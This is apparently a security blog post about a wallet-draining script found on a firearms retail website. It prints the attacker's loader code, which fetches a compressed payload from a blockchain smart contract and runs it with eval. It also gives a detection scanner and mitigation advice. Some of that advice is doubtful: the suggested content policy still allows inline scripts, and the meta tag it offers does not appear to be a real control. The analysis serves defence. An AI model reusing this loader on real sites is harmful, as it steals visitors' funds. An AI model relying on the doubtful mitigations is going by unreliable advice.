Crypto Wallet Draining Attack Found on a Popular Gun Website
Malicious JavaScript Hidden in a Smart Contract

A recent investigation into a popular firearms and accessories website revealed a major security compromise—a crypto wallet-draining attack embedded in the site’s JavaScript. This attack specifically targets visitors with MetaMask, Trust Wallet, or any Web3-enabled cryptocurrency wallets.
What Happened?
During a review of a well-known site for firearm upgrades and gear, a malicious JavaScript payload was found embedded in the page source. This script is designed to steal cryptocurrency from unsuspecting visitors who have Web3 wallets connected to their browsers.
This attack does not require the user to interact with the page actively—just loading the page with a connected wallet is enough to put them at risk.
🔍 How the Attack Works
1️⃣ The Malicious Script Loads Hidden JavaScript Files
The attack begins when a visitor loads the website. Embedded scripts dynamically load external JavaScript files that are obfuscated and hidden within the site’s cache directory:
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/npm/web3@latest/dist/web3.min.js" defer></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/ajax/libs/pako/2.0.4/pako.min.js" defer></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/npm/[email protected]/crypto-js.min.js" defer></script>
- Web3.js – Enables interaction with cryptocurrency wallets.
- Pako.js – Decompresses encoded JavaScript payloads stored elsewhere.
- Crypto-JS – Helps obfuscate malicious data.
These scripts execute automatically when the page loads, preparing for the next stage of the attack.
2️⃣ Connecting to a Malicious Smart Contract
The script then establishes a connection to Binance Smart Chain (BSC) and retrieves encoded attack code from a deployed smart contract:
const web3 = new Web3("https://bsc-dataseed.binance.org/");
const contract = new web3.eth.Contract(
[
{ "inputs": [], "name": "getPayload", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "stateMutability": "view", "type": "function" }
],
"0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53" // Attacker's smart contract address
);
🚨 This is where the attack becomes unique—malicious JavaScript is stored directly inside the blockchain. 🚨
Unlike traditional malware hosting methods, blockchain smart contracts are immutable and cannot be removed, making it impossible to take down the payload without shutting down the entire blockchain.
3️⃣ Decoding & Executing Malicious Code
Once the payload is retrieved, it is decoded and executed dynamically in the user’s browser:
const ds = pako.ungzip(
Uint8Array.from(atob(await contract.methods.getPayload().call()), c => c.charCodeAt(0)),
{ to: "string" }
);
eval(`(async()=>{${ds}})();`);
This script executes hidden JavaScript that likely:
✅ Extracts private keys or wallet information
✅ Signs unauthorized transactions
✅ Sends user funds to an attacker-controlled wallet
🚨 Users don’t even have to click anything—just visiting the site with a connected crypto wallet is enough to lose their funds.
⚠️ Why This Attack is So Dangerous
This method of attack is particularly difficult to detect and mitigate because:
- 🔹 The malicious payload is stored on a blockchain, making it impossible to take down.
- 🔹 The JavaScript executes dynamically, bypassing traditional security filters.
- 🔹 Web3 wallets are designed to interact with blockchain contracts, so the attack appears legitimate.
- 🔹 No phishing or downloads are required—just loading the site is enough.
🚨 Who is at Risk?
- Users with Web3-enabled browsers and active wallets (MetaMask, Trust Wallet, etc.).
- People who visit affected websites while logged into their crypto wallets.
- Web3 users who do not manually review transaction prompts before signing.
If you visited this site and had MetaMask or another wallet connected, you should:
✅ Disconnect your wallet immediately.
✅ Transfer funds to a secure hardware wallet.
✅ Check transaction history for unauthorized transfers.
🛠️ How Website Owners Can Prevent This Attack
If you run a WordPress or eCommerce website, you need to take security seriously. Here’s how to protect your site from similar attacks:
🔍 1. Scan for Malware
- Use Wordfence Security or MalCare to scan your website for injected scripts.
- Check /wp-content/cache/ for unknown scripts that load Web3.js or other blockchain libraries.
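One way to automate that cache check, as an added example that is not part of the original post: a Node.js scan that flags the script tags, RPC setup and decode-then-eval chain shown earlier in this article. The rule ids, file names and sample contents are constructed for illustration.

```javascript
// Added example: static indicator scan for the three-stage loader described above.
// Rule ids and sample inputs are constructed for illustration.
const RULES = [
  // <script> tag (src or data-rocket-src) pulling in one of the three libraries
  { id: "lib-script-tag", re: /<script\b[^>]*\bsrc=["'][^"']*(?:web3|pako|crypto-js)[^"']*\.js/i },
  // page script builds its own RPC provider instead of using the visitor's wallet
  { id: "hardcoded-rpc", re: /new\s+Web3\s*\(\s*["'`]https?:\/\//i },
  // contract method name from the ABI shown in the article
  { id: "payload-getter", re: /\bgetPayload\b/ },
  // base64 decode feeding gzip inflate
  { id: "decode-chain", re: /pako\s*\.\s*(?:ungzip|inflate)\s*\([\s\S]{0,200}?\batob\s*\(/ },
  // decoded text handed to the interpreter
  { id: "dynamic-exec", re: /\beval\s*\(|\bnew\s+Function\s*\(/ },
];

function scanSource(name, text) {
  const hits = RULES.filter(r => r.re.test(text)).map(r => r.id);
  // decode + execute together is the loader; anything else needs a human look
  const loader = hits.includes("decode-chain") && hits.includes("dynamic-exec");
  return { name, hits, verdict: loader ? "loader" : hits.length ? "review" : "clean" };
}

// Constructed sample files: an injected loader, a page tag, and a benign pako user.
const SAMPLES = {
  "cache/min/1/injected.js": [
    'const web3 = new Web3("https://rpc.example.invalid/");',
    'const c = new web3.eth.Contract(ABI, "0xPLACEHOLDER");',
    'const ds = pako.ungzip(Uint8Array.from(atob(await c.methods.getPayload().call()),',
    '  ch => ch.charCodeAt(0)), { to: "string" });',
    'eval(`(async()=>{${ds}})();`);',
  ].join("\n"),
  "index.html":
    '<script type="rocketlazyloadscript" data-rocket-src="/wp-content/cache/min/1/npm/web3@latest/dist/web3.min.js" defer></script>',
  "theme/export.js":
    'const bytes = pako.ungzip(new Uint8Array(await (await fetch("/export.gz")).arrayBuffer()));',
};

function scanAll(files) {
  return Object.entries(files).map(([name, text]) => scanSource(name, text));
}

for (const r of scanAll(SAMPLES)) console.log(r.verdict.padEnd(7), r.name, r.hits.join(","));
```

To scan a real site, pass `scanAll` an object mapping each file path under the cache directory to its contents; a "review" verdict on a site with no blockchain features deserves the same attention as "loader".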
🛠️ 2. Secure Your Plugins & Themes
- Update all plugins and themes regularly.
- Remove unused or suspicious plugins.
- Avoid using nulled (pirated) plugins, as they often contain backdoors.
🚀 3. Implement a Strong Content Security Policy (CSP)
- Block unauthorized script execution by adding this header:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';
- This prevents malicious JavaScript from running dynamically.
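To see which stages of the loader a given policy actually stops, here is an added example (not from the original post): a simplified CSP evaluator that checks same-origin cache scripts, inline scripts, `eval` and the RPC fetch. The origin `https://shop.example` is a placeholder, and source matching ignores ports and paths.

```javascript
// Added example: simplified CSP check (ignores ports and paths in host sources).
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().toLowerCase().split(/\s+/);
    if (name && !policy.has(name)) policy.set(name, sources); // first duplicate wins
  }
  return policy;
}

// true when `url` is allowed by a source list; null means "no restriction".
function matches(sources, url, pageOrigin) {
  if (sources === null) return true;
  const u = new URL(url);
  return sources.some(s =>
    s === "*" ||
    (s === "'self'" && u.origin === pageOrigin) ||
    s === u.protocol ||                 // scheme source, e.g. https:
    s === u.origin || s === u.host ||   // exact host source
    (s.startsWith("*.") && u.hostname.endsWith(s.slice(1))));
}

// Reports which steps of the loader chain the policy would still permit.
function assess(header, pageOrigin, rpcUrl) {
  const p = parseCsp(header);
  const pick = d => p.get(d) ?? p.get("default-src") ?? null; // fetch-directive fallback
  const script = pick("script-src"), connect = pick("connect-src");
  const hasNonceOrHash = script !== null &&
    script.some(s => /^'(nonce|sha(256|384|512))-/.test(s));
  return {
    cacheScripts: matches(script, pageOrigin + "/wp-content/cache/min/1/lib.js", pageOrigin),
    inlineScript: script === null || (script.includes("'unsafe-inline'") && !hasNonceOrHash),
    evalPayload: script === null || script.includes("'unsafe-eval'"),
    rpcFetch: matches(connect, rpcUrl, pageOrigin),
  };
}

const PAGE_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline';";
const RPC = "https://bsc-dataseed.binance.org/"; // endpoint quoted in the article
console.log(assess(PAGE_POLICY, "https://shop.example", RPC));
console.log(assess("default-src 'self'; script-src 'self'", "https://shop.example", RPC));
```

For the header above, the result shows `eval` and the RPC fetch blocked, while scripts served from the site's own cache directory and inline scripts are still permitted; dropping `'unsafe-inline'` closes the inline path.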
🔐 4. Restrict Web3 Access
- If your site does not require blockchain functionality, block Web3.js execution.
- Disable MetaMask auto-injection with:
<meta name="ethereum:disabled" content="true">
- Warn users before allowing blockchain interactions.
🛡️ 5. Check for Malicious Database Entries
In phpMyAdmin, run this SQL query to check for injected scripts in your WordPress database:
SELECT * FROM wp_options WHERE option_value LIKE '%<script%';
If you find unexpected JavaScript inside WordPress settings, remove it immediately.
📌 Final Thoughts
The discovery of this Web3 wallet-draining attack shows how creative attackers have become. By storing malicious JavaScript inside blockchain smart contracts, they can bypass security measures and steal funds directly from connected wallets.
🔍 Key Takeaways:
✅ Web3-enabled users should disconnect wallets when browsing unfamiliar sites.
✅ Website owners must audit JavaScript files to prevent unauthorized injections.
✅ Security teams must evolve beyond traditional anti-malware approaches to detect blockchain-based threats.
🚨 If you visited an affected site with a connected wallet, assume you are compromised and take immediate action.
Cybersecurity is an ongoing battle—and blockchain technology is both a blessing and a new attack surface for cybercriminals. Stay vigilant. 🔥